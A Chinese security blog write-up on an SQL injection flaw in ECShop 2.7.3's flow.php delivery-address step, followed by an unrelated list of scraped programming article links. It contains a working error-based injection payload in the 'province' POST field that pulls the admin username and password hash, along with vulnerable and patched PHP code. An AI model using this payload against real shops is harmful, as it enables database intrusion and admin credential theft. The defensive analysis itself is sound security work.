ecshop /flow.php SQL Injection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码

Relevant Link:

http://sebug.net/vuldb/ssvid-60554

 
2. 漏洞触发条件

1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等
2. 把任意商品加入购物车在填写配送地址那一页,有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
//比如省选择安徽
3. 其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
用firefox tamper data改成
localhost province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # 
4. 就会回显错误页面了

Relevant Link:

http://www.2cto.com/Article/201212/179861.html


3. 漏洞影响范围
4. 漏洞代码分析

/flow.php

elseif ($_REQUEST['step'] == 'consignee')
{
    ...
    //未对POST数据进行有效过滤
    else
    {
        /*
        * 保存收货人信息
        */
        $consignee = array(
        'address_id'    => empty($_POST['address_id']) ? 0  : intval($_POST['address_id']),
        'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
        'country'       => empty($_POST['country'])    ? '' : $_POST['country'],
        'province'      => empty($_POST['province'])   ? '' : $_POST['province'],
        'city'          => empty($_POST['city'])       ? '' : $_POST['city'],
        'district'      => empty($_POST['district'])   ? '' : $_POST['district'],
        'email'         => empty($_POST['email'])      ? '' : $_POST['email'],
        'address'       => empty($_POST['address'])    ? '' : $_POST['address'],
        'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
        'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
        'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),
        'sign_building' => empty($_POST['sign_building']) ? '' : $_POST['sign_building'],
        'best_time'     => empty($_POST['best_time'])  ? '' : $_POST['best_time'],
        );
        ..


5. 防御方法

/flow.php

elseif ($_REQUEST['step'] == 'consignee')
{
    ...
    else
    {
        /*
        * 保存收货人信息
        */
        $consignee = array(
        /* 对用户输入的POST数据进行有效过滤 */
        'address_id'    => empty($_POST['address_id']) ? 0  :   intval($_POST['address_id']),
        'consignee'     => empty($_POST['consignee'])  ? '' :   compile_str(trim($_POST['consignee'])),
        'country'       => empty($_POST['country'])    ? '' :   intval($_POST['country']),
        'province'      => empty($_POST['province'])   ? '' :   intval($_POST['province']),
        'city'          => empty($_POST['city'])       ? '' :   intval($_POST['city']),
        'district'      => empty($_POST['district'])   ? '' :   intval($_POST['district']),
        /* */
        'email'         => empty($_POST['email'])      ? '' :   compile_str($_POST['email']),
        'address'       => empty($_POST['address'])    ? '' :   compile_str($_POST['address']),
        'zipcode'       => empty($_POST['zipcode'])    ? '' :   compile_str(make_semiangle(trim($_POST['zipcode']))),
        'tel'           => empty($_POST['tel'])        ? '' :   compile_str(make_semiangle(trim($_POST['tel']))),
        'mobile'        => empty($_POST['mobile'])     ? '' :   compile_str(make_semiangle(trim($_POST['mobile']))),
        'sign_building' => empty($_POST['sign_building']) ? '' :compile_str($_POST['sign_building']),
        'best_time'     => empty($_POST['best_time'])  ? '' :   compile_str($_POST['best_time']),
    );
    ..

需要注意的是,empty函数参数必须为variable,不能为其它函数的返回值,包括str_replace、trim等等,否则会报错

Can't use function return value in write context

Relevant Link:

http://www.itokit.com/2012/1028/74804.html


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

你可能感兴趣的:(inject)

  • 组件通信——provide 和 inject 实现爷孙组件通信 你不讲 wood javascriptvue.js前端
    provide和inject实现爷孙组件通信介绍provide和inject是Vue.js提供的一种在组件之间共享数据的机制,它允许在组件树中的任何地方注入依赖项。这对于跨越多个层级的组件间通信特别有用,因此无需手动将prop数据逐层传递下去。provide:在一个组件中使用provide方法来定义要提供的数据或方法。provide方法返回一个对象,该对象包含了要提供的数据或方法。inject:在
  • vue组件通信,点击传值,动态传值(父传子,子传父) 软件技术NINI vue笔记vue.jsjavascript前端
    在Vue中,实现组件间的传值或者是在同一组件内不同元素间(如按钮与某些数据)的交互,通常会使用props、事件(自定义事件)、Vuex(状态管理)、或是Provide/Inject等方式。下面,我将通过一个简单的例子来说明如何在Vue中通过按钮来传递值(触发状态更新)。示例:通过按钮在组件内传递值在这个例子中,我们将展示一个基本的Vue组件,该组件内部有一个按钮和一个用于显示消息的标签。当按钮被点
  • provider和inject跨层数据传递 DngYT vue.jsjavascript前端
    ⑧provider和inject跨层数据传递1)provider顶层组件通过该函数提供数据2)inject底层组件通过该函数获取数据dowen.vue底层组件代码import{inject}from'vue';constvueData=inject("data-key")constcount=inject("count-key")当前文件为底层组件来至顶层组件的普通数据:{{vueData}}来至
  • vue2(4)之scoped解决样式冲突/组件通信/非父子通信/ref和$refs/异步更新/.sync/事件总线/provide和inject 章小絮 vue2和vue3学习vue.jsjavascript前端
    vue2一、学习目标1.组件的三大组成部分(结构/样式/逻辑)2.组件通信3.综合案例:小黑记事本(组件版)4.进阶语法二、scoped解决样式冲突**1.默认情况**:2.代码演示3.scoped原理4.总结三、data必须是一个函数1、data为什么要写成函数2.代码演示3.总结四、组件通信1.什么是组件通信?2.组件之间如何通信3.组件关系分类4.通信解决方案5.父子通信流程6.父向子通信代
  • VUE3学习 第五章 Teleport传送组件、keep-alive缓存组件、transition动画组件、transition-group过度、依赖注入Provide/Inject、兄弟组件Mitt Hyman-ya vue3+ts+vite学习缓存javascript
    一、Teleport传送组件TeleportVue3.0新特性之一。Teleport是一种能够将我们的模板渲染至指定DOM节点,不受父级style、v-show等属性影响,但data、prop数据依旧能够共用的技术;类似于React的Portal。主要解决的问题因为Teleport节点挂载在其他指定的DOM节点下,完全不受父级style样式影响1.使用方法通过to属性插入指定元素位置to=“bod
  • Web安全与网络安全:SQL漏洞注入 hong161688 web安全sqloracle
    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
  • Web安全与网络安全:SQL漏洞注入 bigbig猩猩 typescriptvue.js前端
    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
  • Web安全之SQL注入:如何预防及解决 J老熊 JavaWeb安全web安全sql数据库系统架构面试
    SQL注入(SQLInjection)是最常见的Web应用漏洞之一,它允许攻击者通过注入恶意SQL代码来操作数据库,获取、修改或删除数据。作为Java开发者,理解并防止SQL注入攻击是至关重要的。在本篇文章中,我们将详细介绍SQL注入的原理,演示如何在电商交易系统中出现SQL注入漏洞,并提供正确的防范措施和解决方案。1.什么是SQL注入?SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
  • Spring IoC容器之基于注解的配置 夏与清风
    spring支持多种配置方式,如XML方式、基于注解方式等。比较常用的是基于注解的方式,它将配置信息移入组件类中,在相关的类、方法或字段上声明并使用注解。spring提供了很多注解,如@Required、@Autowired、@Resource、@PostConstruct、@PreDestroy、@Inject、@Qualifier、@Named、@Provider等。基于注解的配置注入会在基于
  • Mybatis 防止sql注入 Ferrari1001
    SQL****注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的****SQL****语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者)。[摘自]SQLinjection-WikipediaSQL****注入,大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以
  • vue3中provide和inject使用。 gxw_viva vue3学习笔记vue.js前端javascript
    在Vue3中,provide和injectAPI是一种非常强大的功能,用于在组件层级之间传递数据,特别是在处理深层嵌套组件时非常有用。它们允许开发者跨越多个组件层级直接传递数据,而不需要通过每个层级逐层传递props。基本概念provide:用于定义要提供给后代组件的数据或方法。inject:用于在后代组件中接收从祖先组件提供的数据或方法。使用方法在祖先组件中提供数据(provide)你可以在祖先
  • Vue 3 中 provide 和 inject 高级用法与最佳实践 暖阳浅笑-嘿 vue.js前端javascript
    《Vue3中provide和inject高级用法与最佳实践》一、基本概念二、高级用法(一)提供函数(二)响应式数据(三)多值提供三、最佳实践(一)封装通用服务(二)避免过度依赖(三)命名规范(四)结合Vuex四、实际应用场景(一)主题切换(二)国际化(三)全局配置五、注意事项(一)数据变更通知(二)依赖注入的层次(三)测试在Vue3的开发中,provide和inject是一对强大的功能,用于实现组
  • Vue 3 中的 provide 和 inject 跨组件通讯 u010373106 Vuevue.jsjavascript前端
    在Vue3中,provide和inject的使用方式略有不同,但依然提供了强大的功能来实现跨组件通信。1.祖先组件提供数据在祖先组件中使用provide提供数据。示例祖先组件(GrandparentComponent.vue):123改变值456789importParentComponentfrom'./ParentComponent.vue';1011constvalue=ref('这是来自祖
  • @Mock 和 @InjectMocks的区别 代码改变世界888 java单元测试
    说明在Mockito中,@Mock和@InjectMocks是用于处理模拟对象的注解,但它们有不同的作用和用途:@Mock注解:@Mock注解用于创建一个模拟对象。模拟对象是用来模拟一个类或接口的实例,以便在测试中模拟该对象的行为。当您使用@Mock注解标记一个字段时,Mockito会自动为该字段创建一个模拟对象,并将其初始化。@Mock主要用于模拟测试目标类(被测试类)中的依赖项或其他与被测试类
  • 【云原生 Kubernetes 系列】K8s 实战 如何给应用注入数据 II 将pod数据传递给容器_pod容器传参 2301_82243558 程序员云原生kubernetesdocker
    这两种呈现Pod和Container字段的方式统称为DownwardAPI。一、通过环境变量将Pod信息传递给容器在文章开始之前,我们先在目录pods/inject/dapi-envars-pod.yaml中创建一个包含一个容器的Pod。这是该Pod的配置文件:apiVersion:v1kind:Podmetadata:name:dapi-envars-fieldrefspec:container
  • Spring 常用注解 Simon_Zz
    1声明bean的注解@Component组件,没有明确的角色@Service在业务逻辑层使用(service层)@Repository数据访问层使用(dao层)@Controller在展现层使用(控制器的声明)2注入bean的注解@Autowired:由Spring提供@Inject:由JSR-330提供JSR330@Resource:由JSR-250提供自我百度可以注解到set方法和属性上3配置
  • Quartz.Net(2)——NetCore3.1整合Quartz.Net contact97 .Net定时框架Quartz.NetNetCore
    在上篇文章中Quartz.Net(1)已经介绍了Quartz.Net的基本运用,该篇文章中将主要介绍NetCore3.1如何整合Quartz.Net,在后台运行定时job,并运用到上篇文章讲到的介绍点。1导入Nuget包Quartz定时框架Quartz.Extensions.DependencyInjection用于在任务中导入其他的服务,整合使用NetCore的依赖注入框架Quartz.Exte
  • Spring扩展点系列-InstantiationAwareBeanPostProcessor 码至终章 Spring生命周期扩展接口springsqljava扩展接口mavenspringboot
    文章目录简介测试一1、配置文件Bean注册2、单元测试方法3、测试类4、输出结果结论测试二1、测试类2、输出结果结论源码解析postProcessPropertiesCommonAnnotationBeanPostProcessorAnnotationInjectedBeanPostProcessor总结简介spring容器中Bean的生命周期内所有可扩展的点的调用顺序扩展接口实现接口Applic
  • 关于6种Web安全常见的攻防姿势 AI大模型-搬运工 web安全安全网络安全网络网络攻击模型
    关于Web安全的问题,是一个老生常谈的问题,作为离用户最近的一层,我们大前端应该把手伸的更远一点。我们最常见的Web安全攻击有以下几种:XSS跨站脚本攻击CSRF跨站请求伪造URL跳转漏洞ClickJacking点击劫持/UI-覆盖攻击SQLInjectionSQL注入OSCommandInjectionOS命令注入一、XSSXSS(CrossSiteScript),中文是跨站脚本攻击;其原本缩写
  • “provide/inject“模式(依赖注入) 默默@85 vue.jsjavascript
    provide和inject是Vue.js中用于依赖注入的一对API,主要用于在组件树中跨层级传递数据。它们通常被用来避免多级组件层级之间的嵌套传递props。基本用法父组件(提供者)父组件使用provide来提供想要共享的数据。exportdefault{name:'ParentComponent',provide(){return{message:'HellofromParent!'};}};
  • Golang:依赖注入与wire LCS-312 golang开发语言后端
    什么是依赖注入?依赖注入(dependencyinjection,缩写DI)是一种软件设计模型,用于实现类之间的解耦和依赖关系的管理。它通过将依赖关系的创建和维护责任转移到外部容器中,使得类不需要自己实例化依赖对象,而是由外部容器动态地注入依赖。这种模式有助于减少类之间的直接依赖,提高代码的可维护性、可测试性和可拓展性。依赖注入的实现方式包括构造函数注入、属性注入、接口注入等,每种方式都有其特定的
  • 【速览】Spring(更新中) GIS程序媛—椰子 springjava后端
    目录一、背景二、优缺点三、适用场景四、核心组成1.IoC(InversionofControl,控制反转)2.DI(DependencyInjection,依赖注入)3.AOP(Aspect-OrientedProgramming,面向切面编程)4.MVC(Model-View-Controller,模型-视图-控制器)五、底层原理六、对比参考一、背景这个技术出现的背景、初衷和要达到什么样的目标或
  • 高级java每日一道面试题-2024年8月22日-框架篇-IOC容器的一些具体的实现有哪些? java我跟你拼了 java每日一道面试题IOC容器框架篇IOC容器实现SpringFrameworkGoogleGuiceWeldPicoContainer
    如果有遗漏,评论区告诉我进行补充面试官:IOC容器的一些具体的实现有哪些?我回答:在Java中,控制反转(InversionofControl,IoC)是一种设计原则,用于减少代码间的耦合。IoC容器是实现IoC原则的一种工具,它负责管理对象之间的依赖关系,而不是由代码直接控制。在Java生态中,IoC容器主要通过依赖注入(DependencyInjection,DI)的方式来实现。以下是一些Ja
  • 论文翻译 - BITE: Textual Backdoor Attacks with Iterative Trigger Injection anniewwy LLMBackdoorAttack
    论文链接:https://arxiv.org/pdf/2205.12700.pdf项目代码:https://github.com/INK-USC/BITEBITE:TextualBackdoorAttackswithIterativeTriggerInjectionAbstract1Introduction2ThreatModel3Methodology3.1BiasMeasurementonLa
  • 实现mini vuex A 风 vuejavascript前端vue.js
    import{inject,reactive,computed}from"vue";constSTORE_KEY="__store__";functionuseStore(){returninject(STORE_KEY);}functioncreateStore(options){returnnewStore(options);}classStore{constructor(options){t
  • VUE祖孙组件之间的传递 凌涑 学习Vue3知识点vue.jsjavascript前端
    说明:vue祖孙组件就是祖宗组件包含父组件,父组件包含孙组件,那如何把祖宗组件的值直接传递给孙子组件呢?知识点1.在祖宗组件使用provide对象,声明参数并赋值2.在孙子组件使用inject对象,接收参数。并在页面显示值代码示例祖宗组件importFufrom"./Fu";exportdefault{name:"Zu",components:{Fu},/*对象式写法,缺点,无法传递data中的值
  • vue子组件修改父组件中的属性 herry-弟弟 vue.js
    需求:有时候我们在父组件中引入子组件,并且想通过子组件事件动态改变父组件中的值,这时我们可以通过provide和inject组合来实现//在父页面定义一个方法,并设置形参,然后通过provide将其暴露出去。exportdefault{provide(){return{updateFunc:this.updateFunc}},data(){return{newContent:''}},method
  • Spring容器的IOC 小靳基础通 springjava后端
    1.IOC定义IOC(Inversionofcontrol)控制反转。在没有IOC的传统开发模式中,对象的创建和对象之间的依赖关系由程序代码直接控制,这导致了高耦合和低灵活性。IOC实际上是一种设计原则,可以通过依赖注入(DependencyInjection,DI)的方式来实现,DI是IOC的一种实现方式。通过IOC容器,对象的创建和生命周期管理由Spring框架接管,而不是由对象本身控制。2.
  • 杨中科 .netcore 依赖注入 Pual singer ASP.NET.netcorec#
    1.概念概念生活中的“控制反转”:自己发电和用电网的电。依赖注入(DependencyInjection,Dl)是控制反转:(InversionofControl,l0c)思想的实现方式。依赖注入简化模块的组装过程,降低模块之间的耦合度自己发电的代码varconnSettings=ConfigurationManager.ConnectionStrings["connstr1"];stringco
  • 依赖注入(DI):对比Java,Go实现方式 农夫小田 Gogolang开发语言后端
    依赖注入:解耦,自动填充代码,方便单元测试的优质轮子!前言熟悉Java语言的同学一定不陌生,依赖注入(DependencyInjection)是Spring框架中的设计基石,有开发经验的同学一定会熟知它的概念(当然也是面试常考问题)。然而在Golang中,我发现很多项目的代码缺少了这一部分,这也是由于Golang并不是严格意义上的面向对象的编程语言。本文将从Java与Go常用框架的DI实现方式分析
  • knob UI插件使用 换个号韩国红果果 JavaScriptjsonpknob
    图形是用canvas绘制的 js代码 var paras = { max:800, min:100, skin:'tron',//button type thickness:.3,//button width width:'200',//define canvas width.,canvas height displayInput:'tr
  • Android+Jquery Mobile学习系列(5)-SQLite数据库 白糖_ JQuery Mobile
    目录导航   SQLite是轻量级的、嵌入式的、关系型数据库,目前已经在iPhone、Android等手机系统中使用,SQLite可移植性好,很容易使用,很小,高效而且可靠。   因为Android已经集成了SQLite,所以开发人员无需引入任何JAR包,而且Android也针对SQLite封装了专属的API,调用起来非常快捷方便。   我也是第一次接触S
  • impala-2.1.2-CDH5.3.2 dayutianfei impala
    最近在整理impala编译的东西,简单记录几个要点: 根据官网的信息(https://github.com/cloudera/Impala/wiki/How-to-build-Impala): 1. 首次编译impala,推荐使用命令: ${IMPALA_HOME}/buildall.sh -skiptests -build_shared_libs -format 2.仅编译BE ${I
  • 求二进制数中1的个数 周凡杨 java算法二进制
    解法一: 对于一个正整数如果是偶数,该数的二进制数的最后一位是 0 ,反之若是奇数,则该数的二进制数的最后一位是 1 。因此,可以考虑利用位移、判断奇偶来实现。   public int bitCount(int x){ int count = 0; while(x!=0){ if(x%2!=0){ /
  • spring中hibernate及事务配置 g21121 Hibernate
    hibernate的sessionFactory配置: <!-- hibernate sessionFactory配置 --> <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"> <
  • log4j.properties 使用 510888780 log4j
    log4j.properties 使用 一.参数意义说明 输出级别的种类 ERROR、WARN、INFO、DEBUG ERROR 为严重错误 主要是程序的错误 WARN 为一般警告,比如session丢失 INFO 为一般要显示的信息,比如登录登出 DEBUG 为程序的调试信息 配置日志信息输出目的地 log4j.appender.appenderName = fully.qua
  • Spring mvc-jfreeChart柱图(2) 布衣凌宇 jfreechart
    上一篇中生成的图是静态的,这篇将按条件进行搜索,并统计成图表,左面为统计图,右面显示搜索出的结果。 第一步:导包 第二步;配置web.xml(上一篇有代码) 建BarRenderer类用于柱子颜色 import java.awt.Color; import java.awt.Paint; import org.jfree.chart.renderer.category.BarR
  • 我的spring学习笔记14-容器扩展点之PropertyPlaceholderConfigurer aijuans Spring3
    PropertyPlaceholderConfigurer是个bean工厂后置处理器的实现,也就是BeanFactoryPostProcessor接口的一个实现。关于BeanFactoryPostProcessor和BeanPostProcessor类似。我会在其他地方介绍。 PropertyPlaceholderConfigurer可以将上下文(配置文件)中的属性值放在另一个单独的标准java
  • maven 之 cobertura 简单使用 antlove maventestunitcoberturareport
    1. 创建一个maven项目 2. 创建com.CoberturaStart.java package com; public class CoberturaStart { public void helloEveryone(){ System.out.println("=================================================
  • 程序的执行顺序 百合不是茶 JAVA执行顺序
          刚在看java核心技术时发现对java的执行顺序不是很明白了,百度一下也没有找到适合自己的资料,所以就简单的回顾一下吧   代码如下;     经典的程序执行面试题 //关于程序执行的顺序 //例如: //定义一个基类 public class A(){ public A(
  • 设置session失效的几种方法 bijian1013 web.xmlsession失效监听器
    在系统登录后,都会设置一个当前session失效的时间,以确保在用户长时间不与服务器交互,自动退出登录,销毁session。具体设置很简单,方法有三种:(1)在主页面或者公共页面中加入:session.setMaxInactiveInterval(900);参数900单位是秒,即在没有活动15分钟后,session将失效。这里要注意这个session设置的时间是根据服务器来计算的,而不是客户端。所
  • java jvm常用命令工具 bijian1013 javajvm
    一.概述         程序运行中经常会遇到各种问题,定位问题时通常需要综合各种信息,如系统日志、堆dump文件、线程dump文件、GC日志等。通过虚拟机监控和诊断工具可以帮忙我们快速获取、分析需要的数据,进而提高问题解决速度。 本文将介绍虚拟机常用监控和问题诊断命令工具的使用方法,主要包含以下工具:       &nbs
  • 【Spring框架一】Spring常用注解之Autowired和Resource注解 bit1129 Spring常用注解
    Spring自从2.0引入注解的方式取代XML配置的方式来做IOC之后,对Spring一些常用注解的含义行为一直处于比较模糊的状态,写几篇总结下Spring常用的注解。本篇包含的注解有如下几个: Autowired Resource Component Service Controller Transactional 根据它们的功能、目的,可以分为三组,Autow
  • mysql 操作遇到safe update mode问题 bitray update
        我并不知道出现这个问题的实际原理,只是通过其他朋友的博客,文章得知的一个解决方案,目前先记录一个解决方法,未来要是真了解以后,还会继续补全.     在mysql5中有一个safe update mode,这个模式让sql操作更加安全,据说要求有where条件,防止全表更新操作.如果必须要进行全表操作,我们可以执行 SET
  • nginx_perl试用 ronin47 nginx_perl试用
    因为空闲时间比较多,所以在CPAN上乱翻,看到了nginx_perl这个项目(原名Nginx::Engine),现在托管在github.com上。地址见:https://github.com/zzzcpan/nginx-perl 这个模块的目的,是在nginx内置官方perl模块的基础上,实现一系列异步非阻塞的api。用connector/writer/reader完成类似proxy的功能(这里
  • java-63-在字符串中删除特定的字符 bylijinnan java
    public class DeleteSpecificChars { /** * Q 63 在字符串中删除特定的字符 * 输入两个字符串,从第一字符串中删除第二个字符串中所有的字符。 * 例如,输入”They are students.”和”aeiou”,则删除之后的第一个字符串变成”Thy r stdnts.” */ public static voi
  • EffectiveJava--创建和销毁对象 ccii 创建和销毁对象
    本章内容: 1. 考虑用静态工厂方法代替构造器 2. 遇到多个构造器参数时要考虑用构建器(Builder模式) 3. 用私有构造器或者枚举类型强化Singleton属性 4. 通过私有构造器强化不可实例化的能力 5. 避免创建不必要的对象 6. 消除过期的对象引用 7. 避免使用终结方法 1. 考虑用静态工厂方法代替构造器     类可以通过
  • [宇宙时代]四边形理论与光速飞行 comsci
       从四边形理论来推论 为什么光子飞船必须获得星光信号才能够进行光速飞行?    一组星体组成星座  向空间辐射一组由复杂星光信号组成的辐射频带,按照四边形-频率假说  一组频率就代表一个时空的入口    那么这种由星光信号组成的辐射频带就代表由这些星体所控制的时空通道,该时空通道在三维空间的投影是一
  • ubuntu server下python脚本迁移数据 cywhoyi pythonKettlepymysqlcx_Oracleubuntu server
    因为是在Ubuntu下,所以安装python、pip、pymysql等都极其方便,sudo apt-get install pymysql, 但是在安装cx_Oracle(连接oracle的模块)出现许多问题,查阅相关资料,发现这边文章能够帮我解决,希望大家少走点弯路。http://www.tbdazhe.com/archives/602 1.安装python 2.安装pip、pymysql
  • Ajax正确但是请求不到值解决方案 dashuaifu Ajaxasync
    Ajax正确但是请求不到值解决方案   解决方案:1 .     async: false ,    2.     设置延时执行js里的ajax或者延时后台java方法!!!!!!!   例如:   $.ajax({     &
  • windows安装配置php+memcached dcj3sjt126com PHPInstallmemcache
    Windows下Memcached的安装配置方法 1、将第一个包解压放某个盘下面,比如在c:\memcached。 2、在终端(也即cmd命令界面)下输入 'c:\memcached\memcached.exe -d install' 安装。 3、再输入: 'c:\memcached\memcached.exe -d start' 启动。(需要注意的: 以后memcached将作为windo
  • iOS开发学习路径的一些建议 dcj3sjt126com ios
    iOS论坛里有朋友要求回答帖子,帖子的标题是: 想学IOS开发高阶一点的东西,从何开始,然后我吧啦吧啦回答写了很多。既然敲了那么多字,我就把我写的回复也贴到博客里来分享,希望能对大家有帮助。欢迎大家也到帖子里讨论和分享,地址:http://bbs.csdn.net/topics/390920759   下面是我回复的内容:   结合自己情况聊下iOS学习建议,
  • Javascript闭包概念 fanfanlovey JavaScript闭包
    1.参考资料 http://www.jb51.net/article/24101.htm http://blog.csdn.net/yn49782026/article/details/8549462 2.内容概述 要理解闭包,首先需要理解变量作用域问题 内部函数可以饮用外面全局变量 var n=999;   functio
  • yum安装mysql5.6 haisheng mysql
    1、安装http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm   2、yum install mysql   3、yum install mysql-server   4、vi /etc/my.cnf   添加character_set_server=utf8
  • po/bo/vo/dao/pojo的详介 IT_zhlp80 javaBOVODAOPOJOpo
        JAVA几种对象的解释 PO:persistant object持久对象,可以看成是与数据库中的表相映射的java对象。最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合。PO中应该不包含任何对数据库的操作. VO:value object值对象。通常用于业务层之间的数据传递,和PO一样也是仅仅包含数据而已。但应是抽象出的业务对象,可
  • java设计模式 kerryg java设计模式
    设计模式的分类:    一、 设计模式总体分为三大类: 1、创建型模式(5种):工厂方法模式,抽象工厂模式,单例模式,建造者模式,原型模式。 2、结构型模式(7种):适配器模式,装饰器模式,代理模式,外观模式,桥接模式,组合模式,享元模式。 3、行为型模式(11种):策略模式,模版方法模式,观察者模式,迭代子模式,责任链模式,命令模式,备忘录模式,状态模式,访问者
  • [1]CXF3.1整合Spring开发webservice——helloworld篇 木头.java springwebserviceCXF
    Spring 版本3.2.10 CXF 版本3.1.1 项目采用MAVEN组织依赖jar 我这里是有parent的pom,为了简洁明了,我直接把所有的依赖都列一起了,所以都没version,反正上面已经写了版本 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="ht
  • Google 工程师亲授:菜鸟开发者一定要投资的十大目标 qindongliang1922 工作感悟人生
    身为软件开发者,有什么是一定得投资的? Google 软件工程师 Emanuel Saringan 整理了十项他认为必要的投资,第一项就是身体健康,英文与数学也都是必备能力吗?来看看他怎么说。(以下文字以作者第一人称撰写)) 你的健康 无疑地,软件开发者是世界上最久坐不动的职业之一。 每天连坐八到十六小时,休息时间只有一点点,绝对会让你的鲔鱼肚肆无忌惮的生长。肥胖容易扩大罹患其他疾病的风险,
  • linux打开最大文件数量1,048,576 tianzhihehe clinux
    File descriptors are represented by the C int type. Not using a special type is often  considered odd, but is, historically, the Unix way. Each Linux process has a maximum number of files th
  • java语言中PO、VO、DAO、BO、POJO几种对象的解释 衞酆夼 javaVOBOPOJOpo
    PO:persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。可以看成是与数据库中的表相映射的java对象。最简单的PO就是对应数据库中某个表中的一条记录,多个记录可以用PO的集合。PO中应该不包含任何对数据库的操作。 BO:business object业务对象 封装业务逻辑的java对象
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他